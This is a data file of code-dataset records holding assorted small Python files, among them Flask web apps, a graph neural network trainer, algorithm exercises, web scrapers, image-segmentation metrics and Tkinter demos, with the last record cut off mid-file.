request.method == 'POST':\n tag = request.form['nombre']\n # Guardamos la categoria en la base de datos\n nuevo_tag = Tag()\n nuevo_tag.name = tag\n db.session.add(nuevo_tag)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Tag creado', 'primary')\n return redirect(url_for(\"admin_tags\"))\n # Obtenems todos los articulos\n tags = Tag.query.all()\n return render_template('web/admin/nuevo_tag.html', tags=tags)\n\n@app.route('/tags/borrar', methods=['POST'])\ndef borrar_tag():\n if request.method == 'POST':\n tag_id_borrar = request.form['tag-borrar']\n # Borramos de la base de datos\n Tag.query.filter_by(id=tag_id_borrar).delete()\n db.session.commit()\n flash('Tag borrada correctamente', 'success')\n return redirect(url_for('admin_categorias'))\n\n@app.route('/tags/editar/', methods=['GET', 'POST'])\ndef editar_tag(id):\n # Consultamos la base de datos\n mi_tag = Tag.query.get(id)\n # Actualizar\n if request.method == 'POST':\n nombre = request.form['nombre']\n mi_tag.name = nombre\n db.session.add(mi_tag)\n db.session.commit()\n flash('Tag actualizado', 'success')\n return redirect(url_for('admin_tags'))\n return render_template(\n 'web/admin/editar_tag.html',\n tag=mi_tag\n )\n\n@app.route('/logout')\ndef logout():\n session.pop('id', None)\n flash('Has cerrado tu sesión correctamente', 'success')\n return redirect(url_for('blog_all'))\n\n@app.route('/buscar')\ndef buscar():\n if request.args.get('q'):\n q = request.args.get('q')\n mis_resultados = Articulos.query.filter(Articulos.title.ilike(f'%{q}%')).all()\n return render_template(\n 'web/blog/busqueda.html',\n resultados=mis_resultados,\n num_resultados=len(mis_resultados),\n busqueda=q\n )\n else:\n return redirect(url_for('blog_all'))\n\n@app.route('/api/articulos/')\ndef api_articulos(pag):\n num_articulos_max = 5\n mis_articulos = Articulos.query.offset((pag-1)*num_articulos_max).limit(num_articulos_max).all() \n # Convertimos un resultado de models a un Json\n dict_resultados = dict()\n for articulo in mis_articulos:\n portada = ''\n if articulo.portada:\n portada = url_for('static', filename='uploads/' + articulo.portada)\n dict_resultados[articulo.id]= {\n 'id': articulo.id,\n 'portada': portada,\n 'title': articulo.title,\n 'text': articulo.text[1:100]\n }\n return jsonify(dict_resultados)\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"leyorgar/blog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11737,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25631510262","text":"listF = {}\r\nlistG = {}\r\n\r\ninlength = int(input('Length: '))\r\n\r\nfor p in range(3, inlength+1, 2):\r\n length = p\r\n track = length\r\n list1 = []\r\n count = 0\r\n while (length != 1):\r\n if (length % 2) == 0:\r\n length = length // 2\r\n if (length < p) and (p not in listG):\r\n listG[p] = count\r\n count += 1\r\n else:\r\n length = (3 * length) + 1\r\n if (length < p) and (p not in listG):\r\n listG[p] = count\r\n count += 1\r\n if(length == 1):\r\n track = track + 1\r\n length = track\r\n break\r\n list1.append(length)\r\n listF[p] = max(list1)\r\n\r\n# print(\"Maximum value of sequence:\")\r\n# print(listF)\r\n\r\n# print(\"Values of sequence:\")\r\n# print(listF.values())\r\n\r\ninverted_dict = {}\r\n\r\n# Iterate over the original dictionary\r\nfor key, value in listG.items():\r\n # Check if the value is already a key in the inverted dictionary\r\n if value in inverted_dict:\r\n # If the value is already a key, append the current key to the list of keys for that value\r\n inverted_dict[value].append(key)\r\n else:\r\n # If the value is not already a key, create a new list with the current key and add it to the dictionary\r\n inverted_dict[value] = [key]\r\n\r\n# Sort the dictionary by the keys in ascending order\r\nsorted_dict = {k: sorted(v) for k, v in sorted(inverted_dict.items())}\r\n\r\n\r\n# for general testing\r\n# print(\"Steps to go below original value:\")\r\n# print(sorted_dict)\r\n\r\n# for big nums reasearch\r\nwith open(\"output.txt\", \"w\") as f:\r\n f.write(\"Steps to go below original value:\\n\")\r\n # Write the sorted dictionary to the file\r\n for key, value in sorted_dict.items():\r\n f.write(f\"{key}: {value}\\n\")\r\n","repo_name":"8-BitCode/3x1","sub_path":"colly.py","file_name":"colly.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33760399845","text":"from google.appengine.api import memcache\nimport time\nimport logging\n\n\ndef current_rate(entity, limit, duration):\n \"\"\"\n Stores a counter with the given name. This function reports rate limit\n denials based on the given limit.\n\n >>> current_rate('rlt_test', 2, 60)\n 1L\n >>> current_rate('rlt_test', 2, 60)\n 2L\n >>> current_rate('rlt_test', 2, 60)\n 3L\n \"\"\"\n\n key = \"ratelimit:{}:{}\".format(int(time.time() / duration), entity)\n value = memcache.incr(key, initial_value=0)\n if value > limit:\n logging.info(\n \"RateLimitDenied({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n else:\n logging.info(\n \"RateLimitAllowed({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n return value\n\n\ndef rate_limit(entity, limit, duration=60):\n \"\"\"\n Runs a rate limit with the given duration.\n\n >>> rate_limit('rlt_test2', 2)\n False\n >>> rate_limit('rlt_test2', 2)\n False\n >>> rate_limit('rlt_test2', 2)\n True\n \"\"\"\n\n return current_rate(entity, limit, duration) > limit\n","repo_name":"uchicago-sg/caravel","sub_path":"caravel/storage/dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"6342531804","text":"import os\nimport sys\nsys.path.insert(0, os.path.abspath('../'))\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport dgl\n\nfrom conv import FALayer\nfrom data import DataLoader, DataProcessor\nfrom utils import seed_everything, get_config, init_params, expRun, RunTimes\n\nimport matplotlib.pyplot as plt\nimport random\n\n\nclass FAGCN(nn.Module):\n def __init__(self, g, eps, num_features, num_classes, hidden_dim, num_layer, dprate, dropout):\n super(FAGCN, self).__init__()\n self.g = g\n self.eps = eps\n self.layer_num = num_layer\n self.dropout = dropout\n self.dprate = dprate\n\n self.feat_encoder = nn.Linear(num_features, hidden_dim)\n self.final_encoder = nn.Linear(hidden_dim, num_classes)\n\n self.layers = nn.ModuleList(\n [FALayer(self.g, hidden_dim, dprate) for i in range(num_layer)])\n \n def forward(self, x):\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = torch.relu(self.feat_encoder(x))\n x = F.dropout(x, p=self.dropout, training=self.training)\n raw = x\n \n for i in range(self.layer_num):\n x = self.layers[i](x)\n x = self.eps * raw + x\n x = self.final_encoder(x)\n\n return x\n \n \n\ndef RunOnce(seed, data, config, device):\n\n seed_everything(seed)\n\n # process data: get laplacian, eigenvalues, eigenvectors, train/validate/test mask\n data_process_config = config.data_process\n model_config = config.model\n train_config = config.train\n\n g = data.g\n data = DataProcessor(data, config.train_rate, config.val_rate, data_process_config)\n data = data.to(device)\n\n\n # init model\n model = FAGCN(g, model_config.eps, data.num_features, data.num_classes,\n model_config.hidden_dim, model_config.num_layer, train_config.dprate, train_config.dropout).to(device)\n model.apply(init_params)\n\n optimizer = torch.optim.Adam(\n model.parameters(), lr=train_config.lr, weight_decay=train_config.weight_decay)\n\n val_acc, test_acc, time_run = expRun(model, optimizer, data, train_config.epochs, train_config.early_stopping)\n\n \n return val_acc, test_acc, time_run\n\n\nconfig = get_config(\"FAGCN\")\ndevice = torch.device('cuda:'+str(config.device)\n if torch.cuda.is_available() else 'cpu')\n\n# load data\ndata = DataLoader(config.dataset)\nU = data.edge_index[0]\nV = data.edge_index[1]\ng = dgl.graph((U, V))\ng = dgl.to_simple(g)\ng = dgl.remove_self_loop(g)\ng = dgl.to_bidirected(g)\n\ng = g.to(device)\ndeg = g.in_degrees().float().to(device)\nnorm = torch.pow(deg, -0.5)\nnorm[torch.isinf(norm)] = 0.\n\ng.ndata['d'] = norm\n\ndata.g = g\n\n\nSEEDS=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n# RunOnce(1, data, config, device)\nRunTimes(SEEDS, RunOnce, data, config, device)","repo_name":"liuyang-tian/Spectral-GNN-Library","sub_path":"examples/fagcn_trainer.py","file_name":"fagcn_trainer.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"1987314095","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Tarea POO\")\n\nLabel(root, text= \"Ingrese sus datos\", bg= \"purple2\", fg= \"white\").grid(row=0, column=0,columnspan=18, sticky= W+E+N+S)\n\n\nLabel(root, text=\"Título\").grid(row=1, column=0, sticky= W)\nLabel(root, text=\"Ruta\").grid(row=2, column=0, sticky= W)\nLabel(root, text=\"Descripción\").grid(row=3, column=0, sticky= W)\ne1 = Entry(root)\ne2 = Entry(root)\ne3 = Entry(root)\ne1.grid(row=1, column=1)\ne2.grid(row=2, column=1)\ne3.grid(row=3, column=1)\n\n\na = Button(root, text=\"Alta\", fg= \"black\"). grid( row=4, column=1, padx=5,pady=2, sticky= N)\nb = Button(root, text=\"Sorpresa\", fg= \"black\"). grid( row=4, column=8, padx=45,pady=2, sticky= SE)\n\n\n\nmainloop() \n\n","repo_name":"Bluemavim/Python3Inicial","sub_path":"Ejercicio 1 U3.py","file_name":"Ejercicio 1 U3.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20852278719","text":"words = []\nflag = []\nres = False\nT = int(input())\nwhile(T>0):\n n = int(input())\n for i in range(n):\n words.append(input())\n if(len(words)==1):\n res = False\n else:\n for i in range(n):\n if((i==0) and (words[i][-1]==words[i+1][0])):\n flag.append(\"true\")\n if(i==(n-1) and (words[i][0]==words[i-1][-1])):\n flag.append(\"true\")\n elif((i!=0) and (i!=(n-1))):\n if((words[i][0]==words[i-1][-1]) and (words[i][-1]==words[i+1][0])):\n flag.append(\"true\")\n else:\n flag.append(\"false\")\n for word in flag:\n if(word==\"true\"):\n res = True\n else:\n res = False\n if(res):\n print(\"Ordering is possible.\")\n else:\n print(\"The door cannot be opened.\")\n T = T - 1\n words = []\n flag = []\n \n \n","repo_name":"shiv6146/SPOJ","sub_path":"WORDS1.py","file_name":"WORDS1.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17356031966","text":"# coding: utf-8\n\"\"\"\nTests utilities\n\"\"\"\nimport unittest\n\nfrom maggma.utils import recursive_update, Timeout\nfrom time import sleep\n\nclass UtilsTests(unittest.TestCase):\n\n def test_recursiveupdate(self):\n d = {\"a\": {\"b\": 3}, \"c\": [4]}\n\n recursive_update(d, {\"c\": [5]})\n self.assertEqual(d[\"c\"], [5])\n\n recursive_update(d, {\"a\": {\"b\": 5}})\n self.assertEqual(d[\"a\"][\"b\"], 5)\n\n recursive_update(d, {\"a\": {\"b\": [6]}})\n self.assertEqual(d[\"a\"][\"b\"], [6])\n\n recursive_update(d, {\"a\": {\"b\": [7]}})\n self.assertEqual(d[\"a\"][\"b\"], [7])\n\n def test_timeout(self):\n\n def takes_too_long():\n with Timeout(seconds=1):\n sleep(2)\n\n self.assertRaises(TimeoutError, takes_too_long)\n","repo_name":"Kamilstepniewski/DjangoProject-Recipe_App","sub_path":"venv/Lib/site-packages/maggma/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34604460366","text":"from typing import List\nfrom collections import deque\n\n\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors is not None else []\n\n\nclass Solution:\n # https://leetcode.com/problems/clone-graph/\n def cloneGraph(self, node: Node):\n if not node:\n return\n if not node.neighbors:\n return Node(node.val)\n\n visited = {}\n\n def _do(node: Node):\n new_node = Node(node.val)\n visited[node.val] = new_node\n for x in node.neighbors:\n if x.val not in visited:\n cloned = _do(x)\n new_node.neighbors.append(cloned)\n else:\n new_node.neighbors.append(visited[x.val])\n return new_node\n\n return _do(node)\n\n # https://leetcode.com/problems/course-schedule/\n def canFinish(self, numCourses: int, prerequisites: List[List[int]]):\n in_degree = {x: 0 for x in range(numCourses)}\n graph = {x: [] for x in range(numCourses)}\n\n for v, u in prerequisites:\n graph[v].append(u)\n in_degree[u] += 1\n\n sources = deque()\n\n for k in in_degree:\n if in_degree[k] == 0:\n sources.append(k)\n\n ordered = []\n\n while sources:\n vertex = sources.popleft()\n ordered.append(vertex)\n\n for x in graph[vertex]:\n in_degree[x] -= 1\n if in_degree[x] == 0:\n sources.append(x)\n\n return len(ordered) == numCourses\n\n # https://leetcode.com/problems/alien-dictionary/\n def alienOrder(self, words: List[str]):\n in_degree = {}\n graph = {}\n\n for word in words:\n for ch in word:\n graph[ch] = []\n in_degree[ch] = 0\n\n for i in range(len(words) - 1):\n w1, w2 = words[i], words[i + 1]\n\n is_diff = False\n for i in range(min(len(w1), len(w2))):\n ch1, ch2 = w1[i], w2[i]\n if ch1 != ch2:\n graph[ch1].append(ch2)\n in_degree[ch2] += 1\n is_diff = True\n break\n if not is_diff and len(w1) > len(w2):\n return ''\n\n sources = deque()\n\n for k in in_degree:\n if in_degree[k] == 0:\n sources.append(k)\n\n ordered = []\n\n while sources:\n vertex = sources.popleft()\n ordered.append(vertex)\n\n for ch in graph[vertex]:\n in_degree[ch] -= 1\n if in_degree[ch] == 0:\n sources.append(ch)\n\n if len(ordered) != len(in_degree):\n return ''\n\n return ''.join(ordered)\n\n # https://leetcode.com/problems/is-graph-bipartite/\n def isBipartite(self, graph: List[List[int]]):\n grouped = {}\n\n for i in range(len(graph)):\n if i not in grouped:\n queue = []\n queue.append((i, 0))\n\n while queue:\n vert, group = queue.pop(0)\n ch_group = 1 if not group else 0\n\n for j in graph[vert]:\n if j not in grouped:\n grouped[j] = ch_group\n queue.append((j, ch_group))\n else:\n if grouped[j] == group:\n return False\n\n return True\n\n # https://leetcode.com/problems/number-of-connected-components-in-an-undirected-graph/\n def countComponents(self, n: int, edges: List[List[int]]):\n graph = {x: [] for x in range(n)}\n\n for v, u in edges:\n graph[v].append(u)\n graph[u].append(v)\n\n res = 0\n\n for i in range(n):\n queue = [i]\n\n if i in graph:\n res += 1\n\n for it in queue:\n if it in graph:\n for ch in graph[it]:\n queue.append(ch)\n del graph[it]\n\n return res\n","repo_name":"lisss/ntbts","sub_path":"algorithms/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27995079262","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt \nimport seaborn as sns\nfrom sklearn.cluster import cluster_optics_dbscan\n\ndef plot_missing_data(df, **kwargs):\n \"\"\"Plots a dataframe's proportion of missing values by column as a horizontal bar chart.\"\"\"\n missing_data_summary = pd.DataFrame(\n df.isna().sum() / len(df),\n columns=['missing']\n ).sort_values('missing', ascending=False)\n fig, ax = plt.subplots(**kwargs)\n sns.barplot(\n data=missing_data_summary,\n y=missing_data_summary.index,\n x='missing',\n color='red',\n orient='h',\n ax=ax\n )\n plt.title('Missing Data by Column')\n plt.xlabel('Proportion Missing')\n plt.show()\n\ndef univ_dist(x, **kwargs):\n \"\"\"Given an array, this function prints its descriptive statistics and plots its distribution.\"\"\"\n print(x.describe())\n fig, (ax1, ax2) = plt.subplots(ncols=2, **kwargs)\n sns.kdeplot(x=x, ax=ax1)\n sns.violinplot(x=x, ax=ax2)\n plt.show()\n\ndef biv_dist(X, xname, yname, **kwargs):\n \"\"\"Given two column names, this function prints their correlation coefficient and displays them in a scatterplot.\"\"\"\n r = round(X.corr().loc[xname, yname], 3)\n print('Correlation Coefficient: {0}'.format(r))\n fig, ax = plt.subplots(**kwargs)\n sns.scatterplot(\n data=X, \n x=xname,\n y=yname,\n ax=ax\n )\n plt.show()\n\ndef plot_corr_matrix(X, **kwargs):\n \"\"\"Given a dataframe, this function calculates its correlation matrix and displays it as a triangular heatmap.\"\"\"\n corr = X.corr()\n mask = np.triu(np.ones_like(corr, dtype=bool)) # mask for the upper triangle \n fig, ax = plt.subplots(**kwargs)\n cmap = sns.diverging_palette(230, 20, as_cmap=True)\n sns.heatmap(\n corr,\n mask=mask,\n cmap=cmap,\n vmax=1, # maximum possible correlation coefficient \n vmin=-1, # minimum possible correlation coefficient \n center=0, # center of possible correlation coefficients \n annot=True, # display correlation coefficients \n fmt=\".2f\", # round correlation coefficients to 2 decimal places\n ax=ax\n )\n return fig\n\ndef plot_loadings(pca_results, component, **kwargs):\n fig, ax = plt.subplots(**kwargs)\n ax = pca_results['loadings'].loc[component].sort_values().plot(kind='barh')\n plt.xlabel('Loading')\n title = \"{0} Loadings\".format(component)\n plt.title(title)\n plt.show()\n\ndef reachability_plot(optics, eps=np.inf, clusters=None, **kwargs):\n x = np.arange(len(optics.labels_))\n reachability = optics.reachability_\n ordering = optics.ordering_\n fig, ax = plt.subplots(**kwargs)\n sns.scatterplot(\n x=x,\n y=reachability[ordering],\n hue=clusters[ordering],\n alpha=0.3,\n linewidth=0,\n ax=ax\n )\n ax.plot(np.full_like(x, eps, dtype=float), \"k-\", alpha=0.5, label='threshold')\n plt.legend()\n ax.set_ylabel('Reachability (epsilon distance)')\n return fig\n","repo_name":"andrewabeles/anomalous-companies","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32881359282","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef get_wewo_soup(word):\n url = f'https://weworkremotely.com/remote-jobs/search?term={word}'\n res = requests.get(url)\n soup = BeautifulSoup(res.text,'html.parser')\n item_box = soup.find('div',{'id':'job_list'}).find_all('ul')\n return item_box\n\ndef extract_wewo_jobs(word):\n url = 'https://weworkremotely.com/'\n info_dict = []\n item_box = get_wewo_soup(word)\n for item in item_box:\n box = item.find_all('li')\n for list in box:\n try:\n title = list.find('span',{'class':'title'}).text\n company = list.find('span',{'class':'company'}).text\n location = list.find('span',{'class':'region company'}).text\n link = url+list.find('a')['href']\n dict = {'title':title,\n 'company':company,\n 'location':location,\n 'link':link}\n info_dict.append(dict)\n except:\n pass\n\n return info_dict\n \n","repo_name":"ankiyong/MultiScrapper","sub_path":"weworkremotely.py","file_name":"weworkremotely.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"75333447256","text":"from flask import Flask, render_template\nfrom markupsafe import escape\n \napp = Flask(__name__)\n \nprendas ={\n100:{ \"tipo\":\"pantalon\",\"talle\":\"S\"},\n101:{ \"tipo\":\"remera\",\"talle\":\"M\"}\n}\n \n@app.get('/')\ndef home():\n return 'Bienvenidos a Macowins!' #c/vez que hacen un request a la app de macowins, devuelve esto.\n \n# @app.get('/prendas/') #escuchá en esta url\n# def get_prendas():\n# return f'Estas son las prendas {prendas}'\n \n@app.get('/prendas/')\ndef get_prendas():\n return render_template(\"prendas.html\",prendas = prendas.items())\n \n#pruebo con localhost:5000/prendas/\n \n# @app.get('/prendas/')\n# def get_prenda(id):\n# prenda_talle = ''\n# for prenda in prendas:\n# if prenda['id']!=id:\n# prenda_talle = prenda['talle']\n# return f'La prenda {id} es talle: {prenda_talle}'\n \n@app.get('/prendas/')\ndef get_prenda(id):\n if id in prendas:\n prenda = prendas[id]\n return render_template(\"prenda.html\",id=id,prenda=prenda)\n else:\n return f'No se encuentra la prenda. Error 404'","repo_name":"franciscohalac/Practicas","sub_path":"tp7/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25586270271","text":"from pprint import pprint\n\nC = int(input()) \nN = int(input()) # 연결되어 있는 컴퓨터 쌍의 수\ngraph = [[]*C for _ in range(C+1)] # (인접행렬) 정점의 갯수만큼 생성\n\nfor _ in range(N):\n u, v = map(int, input().split()) # 간선의 양 끝점 u, v\n graph[u].append(v) # 인접 리스트\n graph[v].append(u)\n\ncnt = 0\nvisited = [0]*(C+1)\ndef dfs(start):\n global cnt # 함수에 사용된 cnt는 지역변수라서 함수 바깥의 영역에서 호출하려면 global 선언 필요\n visited[start] = 1\n for i in graph[start]:\n if visited[i] == 0:\n dfs(i)\n cnt += 1\n\ndfs(1)\nprint(cnt)","repo_name":"jn-97/01-ALGORITHM","sub_path":"2회차/김지연/20220809/1_바이러스.py","file_name":"1_바이러스.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74442605017","text":"\"\"\"\nThis module represents the Producer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2020\n\"\"\"\n\nfrom threading import Thread\nimport time\n\n\nclass Producer(Thread):\n \"\"\"\n Class that represents a producer.\n \"\"\"\n\n def __init__(self, products, marketplace, republish_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n @type products: List()\n @param products: a list of products that the producer will produce\n\n @type marketplace: Marketplace\n @param marketplace: a reference to the marketplace\n\n @type republish_wait_time: Time\n @param republish_wait_time: the number of seconds that a producer must\n wait until the marketplace becomes available\n\n @type kwargs:\n @param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n self.products = products\n self.marketplace = marketplace\n self.wait_time = republish_wait_time\n Thread.__init__(self, **kwargs)\n\n def run(self):\n id_crt = self.marketplace.register_producer()\n\n while True:\n for poz in self.products:\n # poz = elementul curent in lista producatorului\n # de produse (no inspiration, sorry)\n (prod, cantitate_curr, timp_productie_curr) = poz\n # imi setez in variabile valorile necesare prelucrarilor\n time.sleep(cantitate_curr * timp_productie_curr)\n # astept ca elementul curent sa fie produs in cantitatea dorita\n index = 0\n while index < cantitate_curr:\n # incep publicare si pun produs cu produs pana cand ajung\n # la cantitatea dorita\n if not self.marketplace.publish(id_crt, prod):\n # daca nu reusesc -> queue plin deci astept\n time.sleep(self.wait_time)\n while not self.marketplace.publish(id_crt, prod):\n # cat timp intampin probleme cu publicarea\n # (nu am loc in coada) astept\n time.sleep(self.wait_time)\n index += 1 # cand reusesc sa il public , incrementez\n else: # indexul pt a ajunge la numarul\n index += 1 # dorit de publicari (cantitate)\n","repo_name":"CezarMarcu98/Arhitectura-Sistemelor-de-Calcul---Project-1","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33577173575","text":"class Application(ttk.Frame):\n \n def __init__(self, main_window):\n super().__init__(main_window)\n main_window.title(\"Lista en Tcl/Tk\")\n \n # Crear una barra de deslizamiento con orientación vertical.\n scrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)\n # Vincularla con la lista.\n self.listbox = tk.Listbox(self, yscrollcommand=scrollbar.set)\n \n # Insertar 20 elementos.\n for i in range(20):\n self.listbox.insert(tk.END, \"Elemento {}\".format(i))\n \n scrollbar.config(command=self.listbox.yview)\n # Ubicarla a la derecha.\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n self.listbox.pack()\n \n self.pack()\n","repo_name":"3vanDrop/python","sub_path":"tkinter/samples/listbox.py","file_name":"listbox.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"22096847999","text":"import pandas as pd\nfrom pathlib import Path\n\nimport IPython.display\nimport numpy as np\nimport matplotlib as plt\nfrom fastai.data.all import *\nfrom fastai.vision.all import *\nfrom scipy import stats\n\nwd = Path(r'./data/SCUT-FBP5500_v2')\noutput = wd / 'myoutputs'\nimages_path = wd/'Images'\n\ncm_ratings = pd.read_excel(wd/'All_Ratings.xlsx',sheet_name='Caucasian_Male') \nprint(load_learner)\nsorted_cm_df = cm_ratings.groupby('Filename').mean('Rating').sort_values(by=['Rating'])\ncm_ratings = {}\nsorted_cm_list = []\nfor index,row in sorted_cm_df.iterrows():\n cm_ratings[index] = row[\"Rating\"]\n sorted_cm_list.append([index,row[\"Rating\"]])\n\ndef get_cm_paths(path):\n return list(path.glob('CM*'))\n\ndef get_rating(path):\n return cm_ratings[path.name]\n\ndef modified_get_image(images_path):\n print(images_path)\n images_list = get_image_files(images_path)\n print([pathi for pathi in images_list if pathi.name in cm_ratings.keys()]) \n # raise ValueError(cm_ratings[images_list[0].name])\n return [pathi for pathi in images_list ]\n\ncm_block = DataBlock(\n blocks=(ImageBlock,RegressionBlock(n_out=1)),\n # get_items=modified_get_image,\n get_items=get_cm_paths,\n get_y=get_rating,\n splitter=RandomSplitter(valid_pct=0.2, seed=42),\n)\n\ncm_data = cm_block.dataloaders(images_path)\n\nlearn = cnn_learner(cm_data,resnet34,metrics=mae)\nlearn.load('./model_25')\nlearn.export(fname='./models/export.pkl')\n\n\nlearn2 = load_learner(r'./models/export.pkl')\nprint( learn2.predict(r'./resources/CM4.jpg'))\n\n\ndef predict( file_name):\n # getrating\n return learn2.predict(file_name)\n\n # if __name__ == '__main__': \n# print(predict(r'./resources/CM4.jpg'))\n# print(predict(r'./resources/rate.png'))\n\n# print(predict(r'./resources/CM1.jpg'))\n# print(predict(r'./resources/CM11.jpg'))\n","repo_name":"aminehd/selfie_backend","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70352220697","text":"import torch\nimport numpy as np\nimport sklearn.metrics as metrics\n\n\ndef confusion_matrix(predict, target):\n return metrics.confusion_matrix(target, predict)\n\n\ndef jaccard_score(predict, target):\n \"\"\"计算jaccard相似系数\n\n :param predict:\n :param target:\n :return:\n \"\"\"\n return metrics.jaccard_score(target, predict)\n\n\ndef dice_coef(predict, target, ep=1e-8):\n \"\"\"dice相似系数(值域为[0,1]),也称为重叠指数,表示两个物体相交的面积占总面积的比值\n 用于相似性评估\n\n :param ep: 平滑系数\n :param predict: 预测值(类别,非概率)\n :param target: 目标值\n :return: 相似系数\n \"\"\"\n num = predict.size(0)\n pre = predict.view(num, -1)\n tar = target.view(num, -1)\n intersection = (pre * tar).sum()\n return (2. * intersection + ep) / (pre.sum() + tar.sum() + ep)\n\n\ndef IoU(predict, target):\n \"\"\"计算IoU\n\n :param predict: 预测值\n :param target: 真实值\n :return: IoU值\n \"\"\"\n # todo 完成IoU指标的计算\n pass\n\n\ndef mIoU(predict, target):\n pass\n\n\ndef recall(predict, target):\n \"\"\"敏感度,即召回率\n recall/sensitivity = TP / (TP + FN)\n\n :param predict: 预测值\n :param target: 真实值\n :return: 敏感度\n \"\"\"\n predict, target = _process(predict, target)\n tp = np.count_nonzero(predict & target)\n fn = np.count_nonzero(~predict & target) # ~表示取反\n try:\n rec = tp / float(tp + fn)\n except ZeroDivisionError:\n rec = 0.0\n return rec\n\n\ndef precision(predict, target):\n \"\"\"计算精度\n precision = TP / (TP + FP)\n\n :param predict: 预测值\n :param target: 真实值\n :return: 精度值\n \"\"\"\n predict, target = _process(predict, target)\n tp = np.count_nonzero(predict & target)\n fp = np.count_nonzero(predict & ~target)\n try:\n pr = tp / (tp + fp)\n except ZeroDivisionError:\n pr = 0.0\n return pr\n\n\ndef specificity(predict, target):\n \"\"\"计算特异性\n specificity = TN / (TN + FP)\n\n :param predict:\n :param target:\n :return:\n \"\"\"\n predict, target = _process(predict, target)\n tn = np.count_nonzero(~predict & ~target)\n fp = np.count_nonzero(predict & ~target)\n try:\n spec = tn / float(tn + fp)\n except ZeroDivisionError:\n spec = 0.0\n return spec\n\n\ndef _process(predict, target):\n if torch.is_tensor(predict):\n predict = torch.sigmoid(predict).data.cpu().numpy()\n if torch.is_tensor(target):\n target = target.data.cpu().numpy()\n predict = np.atleast_1d(predict.astype(np.bool))\n target = np.atleast_1d(target.astype(np.bool))\n return predict, target\n","repo_name":"chunlei95/Covid19CT-Segmentation","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73607196378","text":"#!/usr/bin/env python3\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nimport sys\r\nimport os\r\nimport http.cookiejar\r\nimport json\r\nimport urllib.request, urllib.error, urllib.parse\r\nfrom csv import reader\r\nfrom csv import DictReader\r\n\r\ndef get_soup(url,header):\r\n #return BeautifulSoup(urllib2.urlopen(urllib2.Request(url,headers=header)),\r\n # 'html.parser')\r\n return BeautifulSoup(urllib.request.urlopen(\r\n urllib.request.Request(url,headers=header)),\r\n 'html.parser')\r\nw=0\r\nwith open('titles.csv', 'r') as read_obj:\r\n csv_dict_reader = DictReader(read_obj)\r\n for row in csv_dict_reader:\r\n\r\n # row variable is a list that represents a row in csv\r\n w= w+1\r\n query = row['Description']\r\n query_name= query\r\n query= query.split()\r\n query='+'.join(query)\r\n url=\"http://www.bing.com/images/search?q=\" + query + \"&FORM=HDRSC2\"\r\n\r\n #add the directory for your image here\r\n DIR=\"Pictures\"\r\n header={'User-Agent':\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\"}\r\n soup = get_soup(url,header)\r\n\r\n ActualImages=[]# contains the link for Large original images, type of image\r\n\r\n for a in 